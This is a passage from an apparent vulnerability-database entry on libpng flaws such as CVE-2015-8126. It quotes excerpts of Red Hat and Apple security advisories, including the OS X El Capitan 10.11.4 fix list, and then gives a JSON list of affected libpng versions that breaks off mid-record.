ppc64: libpng-1.2.49-2.el6_7.ppc.rpm libpng-1.2.49-2.el6_7.ppc64.rpm libpng-debuginfo-1.2.49-2.el6_7.ppc.rpm libpng-debuginfo-1.2.49-2.el6_7.ppc64.rpm libpng-devel-1.2.49-2.el6_7.ppc.rpm libpng-devel-1.2.49-2.el6_7.ppc64.rpm
s390x: libpng-1.2.49-2.el6_7.s390.rpm libpng-1.2.49-2.el6_7.s390x.rpm libpng-debuginfo-1.2.49-2.el6_7.s390.rpm libpng-debuginfo-1.2.49-2.el6_7.s390x.rpm libpng-devel-1.2.49-2.el6_7.s390.rpm libpng-devel-1.2.49-2.el6_7.s390x.rpm
x86_64: libpng-1.2.49-2.el6_7.i686.rpm libpng-1.2.49-2.el6_7.x86_64.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-static-1.2.49-2.el6_7.i686.rpm
ppc64: libpng-debuginfo-1.2.49-2.el6_7.ppc64.rpm libpng-static-1.2.49-2.el6_7.ppc64.rpm
s390x: libpng-debuginfo-1.2.49-2.el6_7.s390x.rpm libpng-static-1.2.49-2.el6_7.s390x.rpm
x86_64: libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm libpng-static-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: libpng-1.2.49-2.el6_7.src.rpm
i386: libpng-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm
x86_64: libpng-1.2.49-2.el6_7.i686.rpm libpng-1.2.49-2.el6_7.x86_64.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-static-1.2.49-2.el6_7.i686.rpm
x86_64: libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm libpng-static-1.2.49-2.el6_7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-7981 https://access.redhat.com/security/cve/CVE-2015-8126 https://access.redhat.com/security/cve/CVE-2015-8472 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWaENsXlSAg2UNWIIRAoUpAJ9Nlo47EQRO6dLZCmTorScK3JsMfACdF3ZW 1H8Hq0Bx4u9dJmTNDBAMHS8= =fXjS -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805, CVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842, CVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872, CVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903, CVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494, CVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427, CVE-2016-3443, CVE-2016-3449)
Red Hat would like to thank Andrea Palazzo of Truel IT for reporting the CVE-2015-4806 issue. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. This issue was addressed with improved validation. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. This issue was addressed by updating to version 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE-----
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.4.15"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.5.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.4.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.5.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.4.17"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.4.14"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.5.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.5.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.5.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "libpng",
"version": "1.5.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.36"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.50"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.44"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.28"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.22"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.33"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.53"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.24"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.45"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.12"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.46"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.14"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.1"
},
{
"_id": null,
"model": "mac os x",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "10.11.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.49"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.39"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.42"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.20"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.15"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.47"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.21"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.27"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.17"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.52"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.18"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.29"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.12"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.14"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.17"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.0.64"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.40"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.25"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.31"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.13"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.15"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.51"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.23"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.30"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.15"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.12"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.20"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.35"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.17"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.24"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.38"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.12"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.18"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.32"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.18"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.54"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.19"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.22"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.13"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.13"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.14"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.48"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.26"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.41"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.43"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.21"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
